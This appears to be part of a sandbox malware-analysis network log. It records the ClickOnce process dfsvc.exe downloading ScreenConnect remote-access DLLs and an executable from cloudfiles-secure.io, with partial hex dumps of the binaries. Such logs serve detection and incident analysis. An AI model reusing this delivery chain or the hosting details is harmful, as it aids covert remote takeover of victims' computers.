                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76
                                                                                                                                                                                                                Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00
                                                                                                                                                                                                                Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
                                                                                                                                                                                                                2024-10-02 04:16:33 UTC16384INData Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06
                                                                                                                                                                                                                Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                9192.168.2.449755178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:34 UTC104OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 68096
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:34 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC16384INData Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00
                                                                                                                                                                                                                Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC16384INData Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4
                                                                                                                                                                                                                Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC16384INData Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e
                                                                                                                                                                                                                Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC2776INData Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68
                                                                                                                                                                                                                Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                10192.168.2.449758178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:35 UTC98OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 1721856
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:36 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16166INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35
                                                                                                                                                                                                                Data Ascii: ((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f
                                                                                                                                                                                                                Data Ascii: }}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*}%X
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56
                                                                                                                                                                                                                Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd
                                                                                                                                                                                                                Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69
                                                                                                                                                                                                                Data Ascii: [4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f
                                                                                                                                                                                                                Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c
                                                                                                                                                                                                                Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e
                                                                                                                                                                                                                Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
                                                                                                                                                                                                                2024-10-02 04:16:36 UTC16384INData Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79
                                                                                                                                                                                                                Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                11192.168.2.449761178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC104OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 601376
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:37 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
